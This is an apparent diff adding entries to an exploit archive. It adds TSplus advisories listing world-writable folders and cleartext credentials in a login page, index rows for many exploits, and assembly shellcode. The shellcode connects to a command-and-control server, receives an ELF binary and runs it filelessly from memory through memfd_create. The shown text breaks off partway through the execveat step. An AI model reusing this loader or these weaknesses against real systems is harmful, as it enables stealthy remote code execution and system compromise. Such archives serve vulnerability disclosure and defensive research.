+However, insecure file and folder permissions are set, and this could
+allow a malicious user to manipulate file content (e.g.: changing the
+code of html pages or js scripts) or change legitimate files (e.g.
+Setup-RemoteWork-Client.exe) in order to compromise a system or to gain
+elevated privileges.
+
+This is the list of insecure files and folders with their respective
+permissions:
+
+Permission: Everyone:(OI)(CI)(F)
+
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\downloads
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\prints
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\var
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\remoteapp
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\downloads\shared
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\js
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\html5\locales
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\own
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\des
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\key
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\topmenu
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\key\parts
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\java\img\cp
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\java\img\srv
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\java\third\images
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\java\third\js
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\java\third\images\bramus
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\java\third\js\prototype
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\var\log
+
+-------------------------------------------------------------------------------------------
+
+Permission: Everyone:(F)
+
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\robots.txt
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\cgi-bin\hb.exe.config
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\cgi-bin\SessionPrelaunch.Common.dll.config
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\cgi-bin\remoteapp\index.html
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download\common.js
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download\lang.js
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\download\Setup-RemoteWork-Client.exe
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres\jwwebsockify.jar
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres\web.jar
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\html5\own\exitlist.html
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\html5\own\exitupload.html
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\java\index.html
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\java\img\index.html
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\java\img\port.bin
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\java\third\jws.js
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\java\third\sha256.js
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\java\third\js\prototype\prototype.js
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\js\jquery.min.js
\ No newline at end of file
diff --git a/exploits/windows/remote/51681.txt b/exploits/windows/remote/51681.txt
new file mode 100644
index 000000000..10f312095
--- /dev/null
+++ b/exploits/windows/remote/51681.txt
@@ -0,0 +1,45 @@
+# Exploit Title: TSPlus 16.0.0.0 - Remote Work Insecure Credential storage
+# Date: 2023-08-09
+# Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia
+# Vendor Homepage: https://tsplus.net/
+# Version: Up to 16.0.0.0
+# Tested on: Windows
+# CVE : CVE-2023-31069
+
+With TSPlus Remote Work (v. 16.0.0.0) you can create a secure single
+sign-on web portal and remote desktop gateway that enables users to
+remotely access the console session of their office PC.
+It is possible to create a custom web portal login page which allows a
+user to login without providing their credentials.
+However, the credentials are stored in an insecure manner since they are
+saved in cleartext, within the html login page.
+This means that everyone with an access to the web login page, can
+easely retrieve the credentials to access to the application by simply
+looking at the html code page.
+
+This is a code snippet extracted by the source code of the login page
+(var user and var pass):
+
+   // --------------- Access Configuration ---------------
+   var user = "Admin";                         // Login to use when
+connecting to the remote server (leave "" to use the login typed in this
+page)
+   var pass = "SuperSecretPassword";           // Password to use when
+connecting to the remote server (leave "" to use the password typed in
+this page)
+   var domain = "";                            // Domain to use when
+connecting to the remote server (leave "" to use the domain typed in
+this page)
+   var server = "127.0.0.1";                   // Server to connect to
+(leave "" to use localhost and/or the server chosen in this page)
+   var port = "";                              // Port to connect to
+(leave "" to use localhost and/or the port of the server chosen in this
+page)
+   var lang = "as_browser";                    // Language to use
+   var serverhtml5 = "127.0.0.1";              // Server to connect to,
+when using HTML5 client
+   var porthtml5 = "3389";                     // Port to connect to,
+when using HTML5 client
+   var cmdline = "";                           // Optional text that will
+be put in the server's clipboard once connected
+   // --------------- End of Access Configuration ---------------
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index dc91085d8..ddeed0ad1 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -3565,6 +3565,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 36831,exploits/hardware/remote/36831.txt,"Endian Firewall 2.4 - 'openvpn_users.cgi?PATH_INFO' Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",remote,hardware,,2012-02-27,2015-04-27,1,CVE-2012-4923;OSVDB-85700,,,,,https://www.securityfocus.com/bid/52076/info
 51441,exploits/hardware/remote/51441.txt,"Epson Stylus SX510W Printer Remote Power Off - Denial of Service",2023-05-13,"Rafael Pedrero",remote,hardware,,2023-05-13,2023-05-13,0,,,,,,
 22244,exploits/hardware/remote/22244.txt,"Ericsson HM220dp DSL Modem - World Accessible Web Administration Interface",2003-02-11,"Davide Del Vecchio",remote,hardware,,2003-02-11,2012-10-25,1,CVE-2003-1442;OSVDB-59601,,,,,https://www.securityfocus.com/bid/6824/info
+51685,exploits/hardware/remote/51685.txt,"EuroTel ETL3100 - Transmitter Authorization Bypass (IDOR)",2023-08-21,LiquidWorm,remote,hardware,,2023-08-21,2023-08-21,0,,,,,,
+51684,exploits/hardware/remote/51684.txt,"EuroTel ETL3100 - Transmitter Default Credentials",2023-08-21,LiquidWorm,remote,hardware,,2023-08-21,2023-08-21,0,,,,,,
+51686,exploits/hardware/remote/51686.txt,"EuroTel ETL3100 - Transmitter Unauthenticated Config/Log Download",2023-08-21,LiquidWorm,remote,hardware,,2023-08-21,2023-08-21,0,,,,,,
 40474,exploits/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",remote,hardware,,2016-10-06,2016-10-06,0,,,,,,
 19091,exploits/hardware/remote/19091.py,"F5 BIG-IP - Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",remote,hardware,,2012-06-12,2016-12-09,1,CVE-2012-1493;OSVDB-82780,,,,,
 34465,exploits/hardware/remote/34465.txt,"F5 Big-IP - rsync Access",2014-08-29,Security-Assessment.com,remote,hardware,22,2014-08-29,2014-08-29,0,CVE-2014-2927,,,,,
@@ -16021,6 +16024,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47388,exploits/php/webapps/47388.txt,"College-Management-System 1.2 - Authentication Bypass",2019-09-14,cakes,webapps,php,,2019-09-14,2019-09-14,1,,,,,http://www.exploit-db.comCollege-Management-System-master.zip,
 48593,exploits/php/webapps/48593.txt,"College-Management-System-Php 1.0 - Authentication Bypass",2020-06-17,"BLAY ABU SAFIAN",webapps,php,,2020-06-17,2020-06-17,0,,,,,,
 47395,exploits/php/webapps/47395.txt,"CollegeManagementSystem-CMS 1.3 - 'batch' SQL Injection",2019-09-16,cakes,webapps,php,,2019-09-16,2019-09-16,1,,,,,http://www.exploit-db.comCollegeManagementSystem-CMS-1-3.zip,
+51689,exploits/php/webapps/51689.txt,"Color Prediction Game v1.0 - SQL Injection",2023-08-21,"Ahmet Ümit BAYRAM",webapps,php,,2023-08-21,2023-08-21,0,,,,,,
 40527,exploits/php/webapps/40527.txt,"Colorful Blog - Cross-Site Request Forgery (Change Admin Password)",2016-10-13,Besim,webapps,php,,2016-10-13,2016-10-13,0,,,,,,
 40526,exploits/php/webapps/40526.txt,"Colorful Blog - Persistent Cross-Site Scripting",2016-10-13,Besim,webapps,php,,2016-10-13,2016-10-14,0,,,,,,
 46209,exploits/php/webapps/46209.txt,"Coman 1.0 - 'id' SQL Injection",2019-01-21,"Ihsan Sencan",webapps,php,80,2019-01-21,2019-01-21,1,,"SQL Injection (SQLi)",,,,
@@ -16394,6 +16398,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 6586,exploits/php/webapps/6586.txt,"Crux Gallery 1.32 - Insecure Cookie Handling",2008-09-26,Pepelux,webapps,php,,2008-09-25,,1,OSVDB-49048;CVE-2008-4484;OSVDB-48660,,,,,
 31097,exploits/php/webapps/31097.txt,"CruxCMS 3.0 - 'search.php' Cross-Site Scripting",2008-02-04,Psiczn,webapps,php,,2008-02-04,2014-01-21,1,CVE-2008-0700;OSVDB-41520,,,,,https://www.securityfocus.com/bid/27588/info
 35155,exploits/php/webapps/35155.txt,"CruxCMS 3.0 - Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,webapps,php,,2010-12-26,2014-11-04,1,,,,,,https://www.securityfocus.com/bid/45594/info
+51688,exploits/php/webapps/51688.txt,"Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)",2023-08-21,0xBr,webapps,php,,2023-08-21,2023-08-21,0,CVE-2023-37759,,,,,
 32952,exploits/php/webapps/32952.txt,"CS Whois Lookup - 'ip' Remote Command Execution",2009-04-23,SirGod,webapps,php,,2009-04-23,2014-04-21,1,,,,,,https://www.securityfocus.com/bid/34700/info
 27030,exploits/php/webapps/27030.txt,"CS-Cart - Multiple SQL Injections",2005-12-25,r0t3d3Vil,webapps,php,,2005-12-25,2013-07-23,1,CVE-2005-4429;OSVDB-21370,,,,,https://www.securityfocus.com/bid/16134/info
 31443,exploits/php/webapps/31443.txt,"CS-Cart 1.3.2 - 'index.php' Cross-Site Scripting",2008-03-19,sasquatch,webapps,php,,2008-03-19,2014-02-06,1,CVE-2008-1458;OSVDB-43353,,,,,https://www.securityfocus.com/bid/28333/info
@@ -17038,6 +17043,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 45945,exploits/php/webapps/45945.txt,"Dolibarr ERP/CRM 8.0.3 - Cross-Site Scripting",2018-12-04,AkkuS,webapps,php,80,2018-12-04,2018-12-04,0,CVE-2018-19799,"Cross-Site Scripting (XSS)",,,,
 18725,exploits/php/webapps/18725.txt,"Dolibarr ERP/CRM < 3.2.0 / < 3.1.1 - OS Command Injection",2012-04-09,"Nahuel Grisolia",webapps,php,,2012-04-09,2018-07-13,1,OSVDB-80980,,,,,
 44964,exploits/php/webapps/44964.txt,"Dolibarr ERP/CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80,2018-07-02,2018-07-13,0,,"Code Injection",,,http://www.exploit-db.comdolibarr-7.0.0.tar.gz,
+51683,exploits/php/webapps/51683.txt,"Dolibarr Version 17.0.1 - Stored XSS",2023-08-21,"Furkan Karaarslan",webapps,php,,2023-08-21,2023-08-21,0,,,,,,
 15400,exploits/php/webapps/15400.txt,"Dolphin 7.0.3 - Multiple Vulnerabilities",2010-11-02,anT!-Tr0J4n,webapps,php,,2010-11-02,2010-11-02,0,OSVDB-68981,,,,http://www.exploit-db.comDolphin-v.7.0.3.zip,
 35332,exploits/php/webapps/35332.txt,"Dolphin 7.0.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-10,"AutoSec Tools",webapps,php,,2011-02-10,2014-11-23,1,,,,,,https://www.securityfocus.com/bid/46337/info
 17994,exploits/php/webapps/17994.php,"Dolphin 7.0.7 - 'member_menu_queries.php' Remote PHP Code Injection",2011-10-18,EgiX,webapps,php,,2011-10-18,2011-10-18,0,OSVDB-76662,,,,http://www.exploit-db.comDolphin-v.7.0.7.zip,
@@ -19113,6 +19119,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41665,exploits/php/webapps/41665.txt,"GLink Word Link Script 1.2.3 - SQL Injection",2017-03-22,"Ihsan Sencan",webapps,php,,2017-03-22,2017-03-22,0,,,,,http://www.exploit-db.comscript_131.zip,
 5806,exploits/php/webapps/5806.pl,"GLLCTS2 - 'sort' Blind SQL Injection",2008-06-13,anonymous,webapps,php,,2008-06-12,2016-12-06,1,OSVDB-46171;CVE-2008-2919,,,,,
 5796,exploits/php/webapps/5796.php,"GLLCTS2 < 4.2.4 - 'detail' SQL Injection",2008-06-12,TheDefaced,webapps,php,,2008-06-11,2016-12-06,1,OSVDB-46172;CVE-2008-2746,,,,,
+51690,exploits/php/webapps/51690.txt,"Global - Multi School Management System Express v1.0- SQL Injection",2023-08-21,"Ahmet Ümit BAYRAM",webapps,php,,2023-08-21,2023-08-21,0,,,,,,
 30438,exploits/php/webapps/30438.txt,"Global Centre Aplomb Poll 1.1 - 'admin.php?Madoa' Remote File Inclusion",2007-07-30,"ilker Kandemir",webapps,php,,2007-07-30,2013-12-23,1,CVE-2007-4101;OSVDB-37264,,,,,https://www.securityfocus.com/bid/25138/info
 30436,exploits/php/webapps/30436.txt,"Global Centre Aplomb Poll 1.1 - 'index.php?Madoa' Remote File Inclusion",2007-07-30,"ilker Kandemir",webapps,php,,2007-07-30,2013-12-23,1,CVE-2007-4101;OSVDB-37262,,,,,https://www.securityfocus.com/bid/25138/info
 30437,exploits/php/webapps/30437.txt,"Global Centre Aplomb Poll 1.1 - 'vote.php?Madoa' Remote File Inclusion",2007-07-30,"ilker Kandemir",webapps,php,,2007-07-30,2013-12-23,1,CVE-2007-4101;OSVDB-37263,,,,,https://www.securityfocus.com/bid/25138/info
@@ -25372,6 +25379,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 39068,exploits/php/webapps/39068.txt,"Ovidentia online Module 2.8 - 'GLOBALS[babAddonPhpPath]' Remote File Inclusion",2015-12-21,bd0rk,webapps,php,,2015-12-21,2015-12-21,0,OSVDB-132299,,,,http://www.exploit-db.comonline-2-8.zip,
 39688,exploits/php/webapps/39688.txt,"Ovidentia troubleticketsModule 7.6 - Remote File Inclusion",2016-04-12,bd0rk,webapps,php,80,2016-04-12,2016-04-12,0,,,,,http://www.exploit-db.comtroubletickets-7-6.zip,
 39069,exploits/php/webapps/39069.pl,"Ovidentia Widgets 1.0.61 - Remote Command Execution",2015-12-21,bd0rk,webapps,php,80,2015-12-21,2015-12-21,0,OSVDB-132298,,,,http://www.exploit-db.comwidgets-1-0-61.zip,
+51691,exploits/php/webapps/51691.txt,"OVOO Movie Portal CMS v3.3.3 - SQL Injection",2023-08-21,"Ahmet Ümit BAYRAM",webapps,php,,2023-08-21,2023-08-21,0,,,,,,
 7597,exploits/php/webapps/7597.txt,"OwenPoll 1.0 - Insecure Cookie Handling",2008-12-28,Osirys,webapps,php,,2008-12-27,,1,OSVDB-51991;CVE-2008-6143,,,,,
 22600,exploits/php/webapps/22600.txt,"Owl Intranet Engine 0.7 - Authentication Bypass",2003-05-14,cdowns,webapps,php,,2003-05-14,2012-11-10,1,,,,,,https://www.securityfocus.com/bid/7595/info
 1561,exploits/php/webapps/1561.pl,"OWL Intranet Engine 0.82 - 'xrms_file_root' Code Execution",2006-03-07,rgod,webapps,php,,2006-03-06,2016-06-29,1,OSVDB-23734;CVE-2006-1149,,,,http://www.exploit-db.comOwl-0.82.tar.gz,
@@ -26999,6 +27007,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 32251,exploits/php/webapps/32251.txt,"PHPizabi 0.848b C1 HP3 - 'id' Local File Inclusion",2008-08-15,Lostmon,webapps,php,,2008-08-15,2014-03-14,1,CVE-2008-3723;OSVDB-47560,,,,,https://www.securityfocus.com/bid/30707/info
 30911,exploits/php/webapps/30911.txt,"PHPJabbers Appointment Scheduler 2.0 - Multiple Vulnerabilities",2014-01-14,HackXBack,webapps,php,80,2014-01-14,2014-01-14,0,OSVDB-102246;OSVDB-102163;OSVDB-102147;CVE-2014-10010;CVE-2014-10001,,,,,
 49281,exploits/php/webapps/49281.txt,"PHPJabbers Appointment Scheduler 2.3 - Reflected XSS (Cross-Site Scripting)",2020-12-17,"Andrea Intilangelo",webapps,php,,2020-12-17,2021-02-15,0,CVE-2020-35416,,,,,
+51687,exploits/php/webapps/51687.txt,"PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities",2023-08-21,"Kerimcan Ozturk",webapps,php,,2023-08-21,2023-08-21,0,,,,,,
 30912,exploits/php/webapps/30912.txt,"PHPJabbers Car Rental Script - Multiple Vulnerabilities",2014-01-14,HackXBack,webapps,php,80,2014-01-14,2014-01-14,0,OSVDB-102162;OSVDB-102146,,,,,
 51651,exploits/php/webapps/51651.txt,"PHPJabbers Cleaning Business 1.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4115,,,,,
 30913,exploits/php/webapps/30913.txt,"PHPJabbers Event Booking Calendar 2.0 - Multiple Vulnerabilities",2014-01-14,HackXBack,webapps,php,80,2014-01-14,2014-01-14,0,OSVDB-102161;OSVDB-102160;OSVDB-102145;CVE-2014-10015;CVE-2014-10014,,,,,
@@ -30460,6 +30469,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 35337,exploits/php/webapps/35337.txt,"TaskFreak! 0.6.4 - 'print_list.php' Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,webapps,php,,2011-02-12,2016-10-27,1,CVE-2011-1062;OSVDB-70878,,,,http://www.exploit-db.comtaskfreak-multi-mysql-0.6.4.tgz,https://www.securityfocus.com/bid/46350/info
 35338,exploits/php/webapps/35338.txt,"TaskFreak! 0.6.4 - 'rss.php' HTTP Referer Header Cross-Site Scripting",2011-02-12,LiquidWorm,webapps,php,,2011-02-12,2016-10-27,1,CVE-2011-1062;OSVDB-70932,,,,http://www.exploit-db.comtaskfreak-multi-mysql-0.6.4.tgz,https://www.securityfocus.com/bid/46350/info
 16158,exploits/php/webapps/16158.txt,"TaskFreak! 0.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,webapps,php,,2011-02-12,2011-02-12,0,CVE-2011-1062;OSVDB-70932;OSVDB-70878;OSVDB-70877,,,,http://www.exploit-db.comtaskfreak-multi-mysql-0.6.4.tgz,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4990
+51692,exploits/php/webapps/51692.txt,"Taskhub CRM Tool 2.8.6 - SQL Injection",2023-08-21,"Ahmet Ümit BAYRAM",webapps,php,,2023-08-21,2023-08-21,0,,,,,,
 15269,exploits/php/webapps/15269.txt,"Tastydir 1.2 (1216) - Multiple Vulnerabilities",2010-10-17,R,webapps,php,,2010-10-17,2015-04-17,0,,,,,,
 34809,exploits/php/webapps/34809.txt,"Tausch Ticket Script 3 - 'suchauftraege_user.php?userid' SQL Injection",2009-07-07,Moudi,webapps,php,,2009-07-07,2014-09-29,1,CVE-2009-2428;OSVDB-55691,,,,,https://www.securityfocus.com/bid/43710/info
 34810,exploits/php/webapps/34810.txt,"Tausch Ticket Script 3 - 'vote.php?descr' SQL Injection",2009-07-07,Moudi,webapps,php,,2009-07-07,2014-09-29,1,CVE-2009-2428;OSVDB-55692,,,,,https://www.securityfocus.com/bid/43710/info
@@ -40217,6 +40227,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 38904,exploits/windows/local/38904.txt,"iniNet SpiderControl PLC Editor Simatic 6.30.04 - Insecure File Permissions",2015-12-08,LiquidWorm,local,windows,,2015-12-08,2015-12-08,0,OSVDB-131580,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5283.php
 38903,exploits/windows/local/38903.txt,"iniNet SpiderControl SCADA Web Server Service 2.02 - Insecure File Permissions",2015-12-08,LiquidWorm,local,windows,,2015-12-08,2015-12-08,0,OSVDB-131579,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5284.php
 23996,exploits/windows/local/23996.py,"Inmatrix Ltd. Zoom Player 8.5 - '.jpeg'File Memory Corruption / Arbitrary Code Execution",2013-01-09,"Debasish Mandal",local,windows,,2013-01-09,2017-11-22,1,OSVDB-89099,,,,,
+51682,exploits/windows/local/51682.txt,"Inosoft VisiWin 7 2022-2.1 - Insecure Folders Permissions",2023-08-21,shinnai,local,windows,,2023-08-21,2023-08-21,0,CVE-2023-31468,,,,,
 48795,exploits/windows/local/48795.txt,"Input Director 1.4.3 - 'Input Director' Unquoted Service Path",2020-09-09,"TOUHAMI Kasbaoui",local,windows,,2020-09-09,2020-09-09,0,,,,,,
 40522,exploits/windows/local/40522.txt,"InsOnSrv Asus InstantOn 2.3.1.1 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",local,windows,,2016-10-13,2016-10-13,0,,,,,,
 40072,exploits/windows/local/40072.txt,"InstantHMI 6.1 - Local Privilege Escalation",2016-07-08,sh4d0wman,local,windows,,2016-07-08,2016-07-08,0,,,,,,
@@ -45193,6 +45204,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 21675,exploits/windows/remote/21675.pl,"Trillian 0.x IRC Module - Remote Buffer Overflow",2002-07-31,"John C. Hennessy",remote,windows,,2002-07-31,2012-10-02,1,OSVDB-10789,,,,,https://www.securityfocus.com/bid/5373/info
 30315,exploits/windows/remote/30315.txt,"Trillian 3.1.6.0 - URI Handler Remote Code Execution",2007-07-16,"Nate Mcfeters",remote,windows,,2007-07-16,2013-12-16,1,CVE-2007-3832;OSVDB-38171,,,,,https://www.securityfocus.com/bid/24927/info
 19561,exploits/windows/remote/19561.c,"True North Software Internet Anywhere Mail Server 2.3.x - Mail Server Multiple Buffer Overflow",1999-10-01,"Arne Vidstrom",remote,windows,,1999-10-01,2017-11-15,1,CVE-2000-0016;OSVDB-13591,,iamexploit.c,,,https://www.securityfocus.com/bid/730/info
+51681,exploits/windows/remote/51681.txt,"TSPlus 16.0.0.0 - Remote Work Insecure Credential storage",2023-08-21,shinnai,remote,windows,,2023-08-21,2023-08-21,0,CVE-2023-31069,,,,,
+51680,exploits/windows/remote/51680.txt,"TSplus 16.0.0.0 - Remote Work Insecure Files and Folders",2023-08-21,shinnai,remote,windows,,2023-08-21,2023-08-21,0,CVE-2023-31068,,,,,
+51679,exploits/windows/remote/51679.txt,"TSplus 16.0.2.14 - Remote Access Insecure Files and Folders Permissions",2023-08-21,shinnai,remote,windows,,2023-08-21,2023-08-21,0,CVE-2023-31067,,,,,
 5398,exploits/windows/remote/5398.html,"Tumbleweed SecureTransport 4.6.1 FileTransfer - ActiveX Buffer Overflow",2008-04-07,"Patrick Webster",remote,windows,,2008-04-06,2016-11-21,1,OSVDB-44252;CVE-2008-1724,,,,,
 16563,exploits/windows/remote/16563.rb,"Tumbleweed SecureTransport FileTransfer - 'vcst_eu.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,remote,windows,,2010-06-15,2016-10-27,1,CVE-2008-1724;OSVDB-44252,"Metasploit Framework (MSF)",,,,
 22161,exploits/windows/remote/22161.rb,"Turbo FTP Server 1.30.823 - PORT Overflow (Metasploit)",2012-10-23,Metasploit,remote,windows,21,2012-10-23,2012-10-23,1,OSVDB-85887,"Metasploit Framework (MSF)",,,,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index d3a5a6a0f..8882077c1 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -192,6 +192,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
 47239,shellcodes/linux/47239.c,"Linux/Tru64 alpha - execve(/bin/sh) Shellcode (108 bytes)",2019-03-25,"Hacker House",,linux,108,2019-08-13,2019-08-13,0,,,,,,https://github.com/hackerhouse-opensource/shellcode/blob/12c468d26e3fb395462dd030c6b9700aed6a3826/alpha/execve.c
 49756,shellcodes/linux/49756.asm,"Linux/x64 - /sbin/halt -p Shellcode (51 bytes)",2021-04-09,"Chenthur Velan",,linux,,2021-04-09,2021-10-28,0,,,,,,
 49472,shellcodes/linux/49472.c,"Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)",2021-01-25,"Guillem Alminyana",,linux,,2021-01-25,2021-10-29,0,,,,,,
+51693,shellcodes/linux/51693.asm,"Linux/x64 - memfd_create ELF loader Shellcode (170 bytes)",2023-08-21,"Ivan Nikolsky",,linux,170,2023-08-21,2023-08-21,0,,,,,,
 40128,shellcodes/linux_crisv32/40128.c,"Linux/CRISv32 Axis Communication - Reverse (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes)",2016-07-20,bashis,,linux_crisv32,189,2016-07-20,2018-01-12,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-903.php
 45541,shellcodes/linux_mips/45541.c,"Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse (192.168.2.157:31337/TCP) Shellcode (181 bytes)",2018-10-08,cq674350529,,linux_mips,181,2018-10-08,2018-10-08,0,,,,,,
 13298,shellcodes/linux_mips/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind (4919/TCP) Shell (/bin/sh) Shellcode (276 bytes)",2008-08-18,vaicebine,,linux_mips,276,2008-08-17,2018-01-12,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-81.php
diff --git a/shellcodes/linux/51693.asm b/shellcodes/linux/51693.asm
new file mode 100644
index 000000000..cbe616af3
--- /dev/null
+++ b/shellcodes/linux/51693.asm
@@ -0,0 +1,148 @@
+# Shellcode Title: Linux/x64 - memfd_create ELF loader (170 bytes)
+# Shellcode Author: Ivan Nikolsky (enty8080) & Tomas Globis (tomasglgg)
+# Tested on: Linux (x86_64)
+# Shellcode Description: This shellcode attempts to establish reverse TCP connection, reads ELF length, reads ELF and maps it into the memory, creates memory file descriptor, writes loaded ELF to it and executes. This shellcode can be used for fileless ELF execution, because no data is writted to disk
+# Blog post: https://blog.entysec.com/2023-04-02-remote-elf-loading/
+# Original code: https://github.com/EntySec/Pawn
+
+section .text
+global _start
+
+_start:
+    ; Set up socket for further communication with C2
+    ;
+    ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
+
+    push 0x29
+    pop  rax
+    cdq
+    push 0x2
+    pop  rdi
+    push 0x1
+    pop  rsi
+    syscall
+
+    ; Connect to the C2 server
+    ;
+    ; int connect(int sockfd, {
+    ;                 sa_family=AF_INET,
+    ;                 sin_port=htons(8888),
+    ;                 sin_addr=inet_addr("127.0.0.1")
+    ;             }, 16);
+
+    xchg rdi, rax
+    mov  rcx, 0x0100007fb8220002
+    push rcx
+    mov  rsi, rsp
+    push 0x10
+    pop  rdx
+    push 0x2a
+    pop  rax
+    syscall
+
+    ; Read ELF length from socket
+    ;
+    ; read(unsigned int fd, char *buf, 8);
+
+    pop  rcx
+    push 0x8
+    pop  rdx
+    push 0x0
+    lea  rsi, [rsp]
+    xor  rax, rax
+    syscall
+
+    ; Save length to r12 and socket descriptor to r13
+
+    pop  r12
+    push rdi
+    pop  r13
+
+    ; Create file descriptor for ELF file
+    ;
+    ; int memfd_create("", 0);
+
+    xor  rax, rax
+    push rax
+    push rsp
+    sub  rsp, 8
+    mov  rdi, rsp
+    push 0x13f
+    pop  rax
+    xor  rsi, rsi
+    syscall
+
+    ; Save file descriptor to r14
+
+    push rax
+    pop  r14
+
+    ; Allocate memory space for ELF file
+    ;
+    ; void *mmap(NULL, size_t count,
+    ;            PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
+
+    push 0x9
+    pop  rax
+    xor  rdi, rdi
+    push r12
+    pop  rsi
+    push 0x7
+    pop  rdx
+    xor  r9, r9
+    push 0x22
+    pop  r10
+    syscall
+
+    ; Save address to the allocated memory space to r15
+
+    push rax
+    pop  r15
+
+    ; Read ELF file from socket
+    ;
+    ; recvfrom(int sockfd, void *buf, size_t count, MSG_WAITALL, NULL, 0);
+
+    push 0x2d
+    pop  rax
+    push r13
+    pop  rdi
+    push r15
+    pop  rsi
+    push r12
+    pop  rdx
+    push 0x100
+    pop  r10
+    syscall
+
+    ; Write read ELF file data to the file descriptor
+    ;
+    ; size_t write(unsigned int fd, const char *buf, size_t count);
+
+    push 0x1
+    pop  rax
+    push r14
+    pop  rdi
+    push r12
+    pop  rdx
+    syscall
+
+    ; Execute ELF from file descriptor
+    ;
+    ; int execveat(int dfd, const char *filename,
